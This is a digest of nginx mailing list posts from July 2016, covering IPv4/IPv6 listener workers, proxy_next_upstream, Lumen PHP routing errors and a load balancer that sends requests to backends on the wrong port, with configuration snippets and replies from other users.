realized I didn't include the server directive in my initial email, sorry about that. I'll include the entire set of configuration below. I feel like I've been through all the configurations that I've seen during research and from recommendations from others. 
I'm consistently seeing all nginx workers either being set up for ipv4 or ipv6, depending on the config changes. I'm also testing the connection from another server with ipv4/v6 connectivity, so I am able to verify that when the workers are set as ipv4 only ipv4 connections work, and when ipv6 is set on the workers only ipv6 connections work. Version: > nginx -v > nginx version: nginx/1.10.0 (Ubuntu) "bindv6only" is off. > sysctl net.ipv6.bindv6only > net.ipv6.bindv6only = 0 The configuration tests as ok. > sudo nginx -t -c /etc/nginx/nginx.conf > nginx: the configuration file /etc/nginx/nginx.conf syntax is ok > nginx: configuration file /etc/nginx/nginx.conf test is successful Here's my simplified config (sites-enabled is disabled): > # /etc/nginx/nginx.conf > user www-data; > worker_rlimit_nofile 30000; > worker_processes 8; > pid /run/nginx.pid; > > events { > worker_connections 500000; > } > > http { > sendfile on; > tcp_nopush on; > tcp_nodelay on; > keepalive_timeout 65; > types_hash_max_size 2048; > > include /etc/nginx/mime.types; > default_type application/octet-stream; > > access_log /var/log/nginx/access.log; > error_log /var/log/nginx/error.log; > > gzip on; > gzip_disable "msie6"; > gzip_vary on; > gzip_proxied any; > gzip_comp_level 6; > gzip_buffers 16 8k; > gzip_http_version 1.1; > gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript; > > include /etc/nginx/conf.d/*.conf; > # include /etc/nginx/sites-enabled/*; > > # /etc/nginx/sites-enabled/blog > server { > server_name test.bloggyblog.com; > > listen 80; > listen [::]:80; > > root /usr/local/apps/blog; > index index.php; > > location / { > try_files $uri $uri/ =404; > } > > location ~ \.php$ { > try_files $uri =404; > fastcgi_split_path_info ^(.+\.php)(/.+)$; > fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; > fastcgi_index index.php; > fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; > include 
fastcgi_params; > } > } > } These are the results of different configurations: listen 80; listen [::]:80; > sudo lsof -i > nginx 1327 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1328 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1329 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1330 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1331 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1332 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1333 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) > nginx 1334 www-data 6u IPv6 275594 0t0 TCP *:http (LISTEN) listen [::]:80 ipv6only=off; > nginx 1492 root 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1493 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1494 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1495 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1496 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1497 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1498 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1499 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) > nginx 1500 www-data 6u IPv4 278341 0t0 TCP *:http (LISTEN) Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268460,268519#msg-268519 From nginx-forum at forum.nginx.org Tue Jul 26 20:47:16 2016 From: nginx-forum at forum.nginx.org (geuis) Date: Tue, 26 Jul 2016 16:47:16 -0400 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: References: Message-ID: <69952183a103b8227cdb6865f646dd19.NginxMailingListEnglish@forum.nginx.org> I've added some more information here. Same problem persists. 
https://forum.nginx.org/read.php?2,268460,268519#msg-268519 Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268460,268520#msg-268520 From nginx-forum at forum.nginx.org Tue Jul 26 21:18:18 2016 From: nginx-forum at forum.nginx.org (geuis) Date: Tue, 26 Jul 2016 17:18:18 -0400 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: <20160726164206.GH57459@mdounin.ru> References: <20160726164206.GH57459@mdounin.ru> Message-ID: <3cb8ff0bf3fbf4040ea8d52d79d6066b.NginxMailingListEnglish@forum.nginx.org> So I was finally able to resolve this, but not in any way I've seen described anywhere else. I set "net.ipv6.bindv6only = 1" in /etc/sysctl.conf and reloaded via "sudo sysctl -p". Then with the configuration "listen 80; listen [::]:80;" I now get my workers split evenly between ipv4 and ipv6 and now I can connect from either ip source. nginx 2096 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2096 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2097 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2097 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2098 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2098 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2099 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2099 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2100 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2100 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2101 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2101 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2102 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2102 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) nginx 2103 www-data 6u IPv4 286321 0t0 TCP *:http (LISTEN) nginx 2103 www-data 7u IPv6 286322 0t0 TCP *:http (LISTEN) Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268460,268522#msg-268522 From nginx-forum at forum.nginx.org Tue Jul 26 23:10:27 2016 From: nginx-forum at forum.nginx.org (geuis) 
Date: Tue, 26 Jul 2016 19:10:27 -0400 Subject: Nginx not spawning both ipv4 and ipv6 workers In-Reply-To: <20160726164206.GH57459@mdounin.ru> References: <20160726164206.GH57459@mdounin.ru> Message-ID: <5e4ad0cd08b90c38fa4b7bed13fb4d08.NginxMailingListEnglish@forum.nginx.org> Last update to this I think. I found the source of the issue and filed a bug about it https://trac.nginx.org/nginx/ticket/1033#ticket. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268460,268526#msg-268526 From nginx-forum at forum.nginx.org Wed Jul 27 00:07:18 2016 From: nginx-forum at forum.nginx.org (mevans336) Date: Tue, 26 Jul 2016 20:07:18 -0400 Subject: proxy_next_upstream http_404? Message-ID: We have a backend server throwing a 404 error, so I added the directive proxy_next_upstream error timeout http_404; but that seems to have no effect. Nginx is still performing round robin connections to the working backend server and the backend server throwing a 404. Is there another directive I need for this to work properly? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268529,268529#msg-268529 From shirley at nginx.com Wed Jul 27 03:16:05 2016 From: shirley at nginx.com (Shirley Bailes) Date: Tue, 26 Jul 2016 20:16:05 -0700 Subject: nginx.conf schedule posted for 2016, September 7-9 in Austin, TX Message-ID: Hello all! The NGINX user conference, nginx.conf 2016 is coming soon: September 7-9 @ the Hilton Hotel in Austin, TX. 
nginx.conf 2016 starts with NGINX experts presenting product roadmaps and technical deep dives. Then listen to use cases from companies like Adobe, Datadog, MuleSoft, Spotify, and more. We'll end the week with NGINX training, including a hands-on workshop highlighting our new Microservices Reference Architecture. We're hosting social time where you can connect with core NGINX developers and community members, and the NGINX booth will be staffed by our engineering team throughout the event to answer any questions you might have. See the full list of speakers and topics here: http://bit.ly/2a6swds We'd like to extend a 50% off discount to each of you as community members. Use NG16ORG or register here now to take advantage of this pricing: http://bit.ly/2ap0X12 See you in Austin! *s 707.569.4888 Build & Deliver Applications, Flawlessly nginx.conf 2016: Sept. 7-9, Austin, TX nginx.com/nginxconf -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 27 06:42:20 2016 From: nginx-forum at forum.nginx.org (gaoyan09) Date: Wed, 27 Jul 2016 02:42:20 -0400 Subject: Would nginx support tcp splicing??? Message-ID: <0262c8bb5a6f1853b94c3c32d21865c2.NginxMailingListEnglish@forum.nginx.org> Do they have a development plan? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268534,268534#msg-268534 From nginx-forum at forum.nginx.org Wed Jul 27 08:16:56 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 04:16:56 -0400 Subject: proxy_next_upstream http_404? 
In-Reply-To: References: Message-ID: Please show your full upstream and proxy config. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268529,268537#msg-268537 From nginx-forum at forum.nginx.org Wed Jul 27 08:24:21 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 04:24:21 -0400 Subject: epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while sending request to upstream In-Reply-To: References: Message-ID: <1385fa9ac43e403a82869656fa1c3ca0.NginxMailingListEnglish@forum.nginx.org> I guess something is wrong with the response header in Chrome; post the entire response header and check again. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,258050,268539#msg-268539 From crasyangel at 163.com Wed Jul 27 08:34:02 2016 From: crasyangel at 163.com (baidu) Date: Wed, 27 Jul 2016 16:34:02 +0800 Subject: When nginx support tcp splicing? Message-ID: Do you have any plan for TCP splicing? -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 27 11:21:42 2016 From: nginx-forum at forum.nginx.org (mevans336) Date: Wed, 27 Jul 2016 07:21:42 -0400 Subject: proxy_next_upstream http_404? In-Reply-To: References: Message-ID: <249fe8c9ee9eb33624bbcc314fc7d362.NginxMailingListEnglish@forum.nginx.org> I figured out what it was. I had an error_page directive in another location block in the same server.conf that was apparently overriding the proxy_next_upstream. I commented it out and now the upstream throwing the 404 is being skipped. I'm just going to remove 404 from the error_page directive. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268529,268544#msg-268544 From al-nginx at none.at Wed Jul 27 12:08:13 2016 From: al-nginx at none.at (Aleksandar Lazic) Date: Wed, 27 Jul 2016 14:08:13 +0200 Subject: When nginx support tcp splicing? In-Reply-To: References: Message-ID: Hi. 
Am 27-07-2016 10:34, schrieb baidu: > Do have any plan for tcp splicing? This was asked in the past http://mailman.nginx.org/pipermail/nginx/2015-December/thread.html#49398 Best regards Aleks From project722 at gmail.com Wed Jul 27 12:33:31 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 07:33:31 -0500 Subject: nginx not forwarding requests to backend servers. Message-ID: I am using nginx as a load balancer. However when I type in the URL for my site, which resolves to the IP of the load balancer, I get the default nginx page saying "nginx has been setup more configuration is required". I would expect nginx to forward my request through to the backend servers I have defined. And oddly enough, there is very little in the way of logging going on, to tell me why it's failing. *My nginx.conf file is as follows:* user nginx; worker_processes 4; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events { worker_connections 1024; } http { upstream myappliationsite.net { # Use ip hash for session persistence ip_hash; server backendappsite1.net; server backendappsite2.net; server backendappsite3.net; # The below only works on nginx plus #sticky route $route_cookie $route_uri; } include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /var/log/nginx/access.log main; sendfile on; #tcp_nopush on; keepalive_timeout 60; gzip on; include /etc/nginx/conf.d/*.conf; } *My default.conf file is as follows:* server { listen 80; server_name myappliationsite.net; keepalive_timeout 70; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { 
root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass http://myappliationsite.net; proxy_set_header HOST myappliationsite.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} } server { listen 443 ssl; server_name myappliationsite.net; keepalive_timeout 70; ssl_certificate /certs/fd.crt; ssl_certificate_key /keys/lb.key; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; #charset koi8-r; #access_log /var/log/nginx/log/host.access.log main; location / { root /usr/share/nginx/html; index index.html index.htm; } #error_page 404 /404.html; # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } # proxy the PHP scripts to Apache listening on 127.0.0.1:80 # location ~ \.php$ { proxy_pass https://myappliationsite.net; proxy_set_header HOST myappliationsite.net; proxy_http_version 1.1; proxy_set_header Connection ""; } # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 # #location ~ \.php$ { # root html; # fastcgi_pass 127.0.0.1:9000; # fastcgi_index index.php; # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; # include fastcgi_params; #} # deny access to .htaccess files, if Apache's document root # concurs with nginx's one # #location ~ /\.ht { # deny all; #} Can anyone help me get requests to go to the backend servers? Is there any other config or dependency apps needed that I may not have installed or running? 
Also is there a way to enable more advanced debug logging to give me a better idea what's going on? Thanks in advance! -------------- next part -------------- An HTML attachment was scrubbed... URL: From project722 at gmail.com Wed Jul 27 13:42:58 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 08:42:58 -0500 Subject: nginx not forwarding requests to backend servers. Message-ID: I am posting this again because a copy never appeared in my inbox. Please ignore if it was actually delivered to the group already. -------------- next part -------------- An HTML attachment was scrubbed... URL: From ben+nginx at list-subs.com Wed Jul 27 13:43:32 2016 From: ben+nginx at list-subs.com (Ben) Date: Wed, 27 Jul 2016 14:43:32 +0100 Subject: NGINX and Lumen (Laravel) 5 Message-ID: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> Hi, I'm having a frustrating time trying to get Lumen (a.k.a. Laravel) working on my NGINX install. At the moment, the best I can get NGINX to give me is 405 errors, which translate to the following error.log entry: stat() "/usr/share/path/to/my/lumen/public/directory//public/lumen/" failed (13: Permission denied), client: 192.168.121.10, server: my.example.com, request: "POST /lumen/ HTTP/1.1", host: "my.example.com" That error is in response to a simple cURL: curl -X POST --data-raw "demo=demo&example=example" https://my.example.com/lumen/ location /lumen { root /usr/share/path/to/my/lumen/public/directory//public; allow 192.168.0.0/16; deny all; expires 0; add_header Pragma "no-cache"; add_header Cache-Control "no-cache, no-store,must-revalidate"; #I have tried various "try_files..." 
#try_files $uri @lumen; try_files $uri $uri/ /index.php?$query_string; } location @lumen { fastcgi_param SCRIPT_FILENAME /usr/share/path/to/my/lumen/public/directory//public/index.php; fastcgi_param SCRIPT_NAME /lumen/; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_param QUERY_STRING $args; } location ~ [^/]\.php(/|$) { fastcgi_split_path_info ^(.+?\.php)(/.*)$; if (!-f $document_root$fastcgi_script_name) { return 405; } fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; include fastcgi_params; } From nginx-forum at forum.nginx.org Wed Jul 27 13:55:37 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 09:55:37 -0400 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: Tested OK with nginx 1.8.0; which nginx version do you use? nginx must be confused by the domain name and the upstream name being the same; rename the upstream name! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268548,268550#msg-268550 From project722 at gmail.com Wed Jul 27 14:07:28 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 09:07:28 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: nginx-1.10.1-1.el6.ngx.x86_64 on RHEL 6. What do you mean by rename the upstream? I thought if my backend applications are listening for requests on https://myapplicationsite.net then that's what the upstream server needs to be defined as in nginx? If I do rename and my backend servers listen on https://myapplicationsite.net then how does nginx know to use that in the https header? What about the server_name declaration and the info in proxy_pass? Would I need to change that too in order to match the new upstream name? 
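What "rename the upstream" amounts to might look like the following sketch. This is only an illustration: the name app_backends is made up here, and any label that differs from the site's domain would work, because the upstream block's name is an internal lookup key for proxy_pass, not a hostname:

```nginx
# Sketch only. "app_backends" is an arbitrary, made-up label;
# it never appears on the wire and is unrelated to DNS or Host headers.
upstream app_backends {
    ip_hash;
    server backendappsite1.net;
    server backendappsite2.net;
    server backendappsite3.net;
}

server {
    listen 80;
    server_name myapplicationsite.net;   # what clients request; unchanged

    location / {
        proxy_pass http://app_backends;               # refers to the block above
        proxy_set_header Host myapplicationsite.net;  # Host header is set separately
    }
}
```

The server_name and the Host header stay exactly as before; only the upstream label changes.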
On Wed, Jul 27, 2016 at 8:55 AM, crasyangel wrote: > test ok with nginx 1.8.0?which nginx version you use? nginx must be > confused > by same domain name and upstream name, rename the upstream name! > > Posted at Nginx Forum: > https://forum.nginx.org/read.php?2,268548,268550#msg-268550 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 27 14:30:31 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 10:30:31 -0400 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: I don't get it. proxy_set_header Host? The upstream name is only used to look up the upstream {} block; it has nothing to do with any proxy headers. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268548,268552#msg-268552 From francis at daoine.org Wed Jul 27 14:48:17 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 27 Jul 2016 15:48:17 +0100 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: <20160727144817.GA12280@daoine.org> On Wed, Jul 27, 2016 at 07:33:31AM -0500, Brian Pugh wrote: Hi there, > I am using nginx as a load balancer. However when I type in the URL for my > site, which resolves to the IP of the load balancer, I get the default > nginx page saying "nginx has been setup more configuration is required". I > would expect nginx to forward my request through to the backend servers I > have defined. What request do you make of nginx? Which of your defined location{} blocks does it match: location / { location = /50x.html { location ~ \.php$ { > And oddly enough, there is very little in the way of logging > going on, to tell me why its failing. You wrote that it is returning some content, presumably with an HTTP 200. 
That suggests that it is not failing to do what you told it to do. It cannot guess what you want it to do. > Can anyone help my get requests to go to the backend servers? Is there Try a request that ends with ".php" ? Use "curl -v" and copy-paste the output, if it is not what you expect. > any other config or depenency apps needed that I may not have installed or > running? Also is there a way to enable more advanced debug logging to give > me a better idea whats going on? There is the "debug log", which is "extra stuff written to the error log": http://nginx.org/en/docs/debugging_log.html Cheers, f -- Francis Daly francis at daoine.org From r at roze.lv Wed Jul 27 14:50:05 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 17:50:05 +0300 Subject: NGINX and Lumen (Laravel) 5 In-Reply-To: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> Message-ID: <4A4C61D6138D47519CACC5491D364F22@MezhRoze> > Which translates to the following error.log entry : > > stat() > "/usr/share/path/to/my/lumen/public/directory//public/lumen/" > failed (13: Permission denied), client: 192.168.121.10, server: > my.example.com, request: "POST /lumen/ HTTP/1.1", host: "my.example.com" Does the nginx user have read permissions on that path? rr From francis at daoine.org Wed Jul 27 15:07:02 2016 From: francis at daoine.org (Francis Daly) Date: Wed, 27 Jul 2016 16:07:02 +0100 Subject: NGINX and Lumen (Laravel) 5 In-Reply-To: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> References: <29143b38-a29c-809a-b601-157667b8db37@list-subs.com> Message-ID: <20160727150702.GB12280@daoine.org> On Wed, Jul 27, 2016 at 02:43:32PM +0100, Ben wrote: Hi there, > At the moment, the best I can get NGINX to give me is 405 errors. 405 is usually "Method Not Allowed", such as when you try to POST to a file. But in this case, you do your own "return 405". 
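As an aside, a common way to avoid the if (!-f ...) { return 405; } construct entirely is try_files, which answers with a conventional 404 for missing scripts. A sketch only, not specific to this poster's paths, and reusing the php-fpm socket shown earlier in the thread:

```nginx
location ~ [^/]\.php(/|$) {
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    # 404 for non-existent scripts, replacing the if/return 405 check.
    # Note: unlike the if (!-f ...) test, this also rejects URIs that
    # append PATH_INFO after the script name, since $uri then includes it.
    try_files $uri =404;
    fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    include fastcgi_params;
}
```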
> Which translates to the following error.log entry : > > stat() > "/usr/share/path/to/my/lumen/public/directory//public/lumen/" > failed (13: Permission denied), client: 192.168.121.10, server: > my.example.com, request: "POST /lumen/ HTTP/1.1", host: > "my.example.com" What happens if the nginx user does ls -l "/usr/share/path/to/my/lumen/public/directory//public/lumen/" ? And: does that error.log entry only appear once? I would expect it twice per request, given your config. > location /lumen { > root /usr/share/path/to/my/lumen/public/directory//public; > try_files $uri $uri/ /index.php?$query_string; So, $uri fails (permission denied), $uri/ fails (permission denied), so now there is an internal rewrite to /index.php. > location ~ [^/]\.php(/|$) { > fastcgi_split_path_info ^(.+?\.php)(/.*)$; > if (!-f $document_root$fastcgi_script_name) { > return 405; > } And unless /usr/local/nginx/html/index.php exists, that "return 405" will happen. That's why what you have fails today. Does searching for something like "site:laravel.com nginx" or "site:nginx.com laravel" or "site:nginx.org laravel" return useful docs? Cheers, f -- Francis Daly francis at daoine.org From project722 at gmail.com Wed Jul 27 15:24:50 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 10:24:50 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: <20160727144817.GA12280@daoine.org> References: <20160727144817.GA12280@daoine.org> Message-ID: What request do you make of nginx? Requests come into nginx as "https://myapplicationsite.net". On the actual backend server, that request is then redirected to: https://myapplicationsite.net//app/service/login?url=%2Fl That brings up the login page on the backend server. Which of your defined location{} blocks does it match: location / { location = /50x.html { location ~ \.php$ { This is another part I am not sure how to set up. 
Since I am not passing any php scripts I would have to say it matches the location /{} block. So I have now modified that section of code to read: location / { #root /usr/share/nginx/html; root /app/service/login?url=%2Fl; index index.html index.htm; } And now, I get a different behavior once these changes are made. It now fails with a 404 not found and in the logs I see: 2016/07/27 10:06:46 [error] 26994#26994: *3 "/app/service/login?url=%2Fl/index.html" is not found (2: No such file or directory), client: 192.168.254.202, server: myapplicationsite.net, request: "GET / HTTP/1.1", host: "myapplicationsite.net" It cannot guess what you want it to do. Right, I get that. I am a newb at nginx so I am looking for guidance on how to set all this up, which is why I posted my complete configs and described exactly what I wanted to accomplish. So, to recap, I have 3 backend servers that can accept connections using the following hostnames: backendappsite1.net backendappsite2.net backendappsite3.net The hostname that maps to nginx is myapplicationsite.net. What I want to happen is anytime a request for myapplicationsite.net hits nginx, it gets sent to one of the servers above in round-robin fashion. Can anyone give me an example config of what it would look like in both nginx.conf and default.conf using the names/info I have provided? On Wed, Jul 27, 2016 at 9:48 AM, Francis Daly wrote: > On Wed, Jul 27, 2016 at 07:33:31AM -0500, Brian Pugh wrote: > > Hi there, > > > I am using nginx as a load balancer. However when I type in the URL for > my > > site, which resolves to the IP of the load balancer, I get the default > > nginx page saying "nginx has been setup more configuration is required". > I > > would expect nginx to forward my request through to the backend servers I > > have defined. > > What request do you make of nginx? 
> > Which of your defined location{} blocks does it match: > > location / { > location = /50x.html { > location ~ \.php$ { > > > And oddly enough, there is very little in the way of logging > > going on, to tell me why its failing. > > You wrote that it is returning some content, presumably with a http > 200. That suggests that it is not failing to do what you told it to do. > > It cannot guess what you want it to do. > > > Can anyone help my get requests to go to the backend servers? Is > there > > Try a request that ends with ".php" ? > > Use "curl -v" and copy-paste the output, if it is not what you expect. > > > any other config or depenency apps needed that I may not have installed > or > > running? Also is there a way to enable more advanced debug logging to > give > > me a better idea whats going on? > > There is the "debug log", which is "extra stuff written to the error log": > > http://nginx.org/en/docs/debugging_log.html > > Cheers, > > f > -- > Francis Daly francis at daoine.org > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Wed Jul 27 15:42:11 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 18:42:11 +0300 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> Message-ID: > Can anyone give me an example config of what it would look like in both > nginx.conf and default.conf using the names/info I have provided? It seems you have taken the default configuration example but if you use nginx as a balancer without serving any .php (or other) files you actually don't need those *.php etc locations - a single location / {} will do the job (means all requests go to backends). 
For example: http { upstream myappliationsite.net { ip_hash; server backendappsite1.net; server backendappsite2.net; server backendappsite3.net; } server { listen 80; listen 443 ssl; server_name myappliationsite.net; location / { proxy_pass http://myappliationsite.net; proxy_set_header HOST myappliationsite.net; } } From project722 at gmail.com Wed Jul 27 16:07:55 2016 From: project722 at gmail.com (Brian Pugh) Date: Wed, 27 Jul 2016 11:07:55 -0500 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: <20160727144817.GA12280@daoine.org> Message-ID: Ok. This looks like progress. However it still fails. Here is my config as it stands now. in nginx.conf: http { upstream myappliationsite.net { ip_hash; server backendappsite1.net; server backendappsite2.net; server backendappsite3.net; } In default.conf: server { listen 443 ssl; server_name myapplicationsite.net; keepalive_timeout 70; ssl_certificate /appssl/fd.crt; ssl_certificate_key /appssl/lb.key; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; location / { proxy_pass http://myapplicationsite.net; proxy_set_header HOST myapplicationsite.net; } } And here are the errors I get: On the web page: 502 bad gateway. From the logs: HTTP/1.1", upstream: *"http://192.168.155.120:80 */", host: "myapplicationsite.net" 2016/07/27 10:54:05 [warn] 27491#27491: *3 upstream server temporarily disabled while connecting to upstream, client: 192.168.254.202, server: myapplicationsite.net, request: "GET / HTTP/1.1", upstream: "*http://192.168.155.120:80 */", host: "myapplicationsite.net" Why is it trying to connect to my servers over port 80? I need to pass it over on 443. How can I accomplish this? Even if I change the proxy pass to https in the logs it still tries. On Wed, Jul 27, 2016 at 10:42 AM, Reinis Rozitis wrote: > Can anyone give me an example config of what it would look like in both >> nginx.conf and default.conf using the names/info I have provided? 
>> > > It seems you have taken the default configuration example but if you use > nginx as a balancer without serving any .php (or other) files you actually > don't need those *.php etc locations - a single location / {} will do the > job (means all requests go to backends). > > For example: > > > http { > upstream myappliationsite.net { > ip_hash; > server backendappsite1.net; > server backendappsite2.net; > server backendappsite3.net; > } > > server { > listen 80; > listen 443 ssl; > > server_name myappliationsite.net; > > location / { > proxy_pass http://myappliationsite.net; > proxy_set_header HOST myappliationsite.net; > } > } > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Wed Jul 27 16:17:38 2016 From: nginx-forum at forum.nginx.org (crasyangel) Date: Wed, 27 Jul 2016 12:17:38 -0400 Subject: nginx not forwarding requests to backend servers. In-Reply-To: References: Message-ID: <9d3e9c761ff070d07a069b332ced40c2.NginxMailingListEnglish@forum.nginx.org> u.default_port = 80; in ngx_http_upstream_server add a new upstream upstream ssl_myappliationsite.net { ip_hash; server backendappsite1.net:443; server backendappsite2.net:443; server backendappsite3.net:443; } server { listen 443 ssl; server_name myapplicationsite.net; keepalive_timeout 70; ssl_certificate /appssl/fd.crt; ssl_certificate_key /appssl/lb.key; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; location / { proxy_pass http://ssl_myappliationsite.net; proxy_set_header HOST myapplicationsite.net; } } Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268547,268559#msg-268559 From r at roze.lv Wed Jul 27 16:18:45 2016 From: r at roze.lv (Reinis Rozitis) Date: Wed, 27 Jul 2016 19:18:45 +0300 Subject: nginx not forwarding requests to backend servers. 
In-Reply-To: References: <20160727144817.GA12280@daoine.org> Message-ID: <240A20A4901A42C99CE03A88864C1A0D@MezhRoze>

> : "myapplicationsite.net"
> 2016/07/27 10:54:05 [warn] 27491#27491: *3 upstream server temporarily
> disabled while connecting to upstream, client: 192.168.254.202, server:
> myapplicationsite.net, request: "GET / HTTP/1.1", upstream:
> "http://192.168.155.120:80/", host: "myapplicationsite.net"
> Why is it trying to connect to my servers over port 80? I need to pass it
> over on 443. How can I accomplish this? Even if I change the proxy pass to
> https, the logs still show the same.

As you don't specify the port in the upstream {} block, nginx uses the default, which is 80 ( http://nginx.org/en/docs/http/ngx_http_upstream_module.html#server )

Also, for a secure backend connection you should enable proxy_ssl.

Reading https://www.nginx.com/resources/admin-guide/nginx-tcp-ssl-upstreams/ should probably be a good start.

rr

